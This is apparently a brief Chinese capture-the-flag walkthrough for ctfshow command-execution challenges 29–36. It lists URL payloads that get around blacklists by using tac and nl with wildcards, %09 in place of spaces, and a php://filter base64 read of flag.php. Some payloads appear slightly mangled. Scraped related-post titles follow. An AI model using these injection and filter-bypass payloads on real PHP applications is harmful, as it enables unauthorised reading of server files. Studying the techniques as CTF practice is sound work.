ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
王琦031813 小时前
Linux的文件管理
linux·运维·服务器
xlq2232213 小时前
高并发服务器day13
运维·服务器
Android系统攻城狮14 小时前
Linux PipeWire深度解析之pw_stream_new调用流程与实战(四十二)
linux·运维·服务器·音频进阶·pipewire音频进阶
Ivan CloudBay14 小时前
CDN 能完全隐藏源服务器 IP 吗?
运维·服务器·tcp/ip
蜉蝣fuyou14 小时前
VMware多版本安装包
linux·vmware·虚拟机
不会代码的小猴14 小时前
Linux note2
linux·笔记
AAA@峥14 小时前
OpenStack Keystone 认证服务完整学习指南
服务器·云计算·openstack
雾里0不看花14 小时前
【App Service Linux】在Linux App Service中安装 tcpdump 并抓取网络包
linux·网络·tcpdump
沉迷学习 日益消瘦15 小时前
13-Ingress 生产实战
运维·kubernetes
Dawn-bit15 小时前
Linux日志处理三剑客之基础篇:(基础正则+扩展正则)
linux·运维·服务器·正则表达式·云计算·运维开发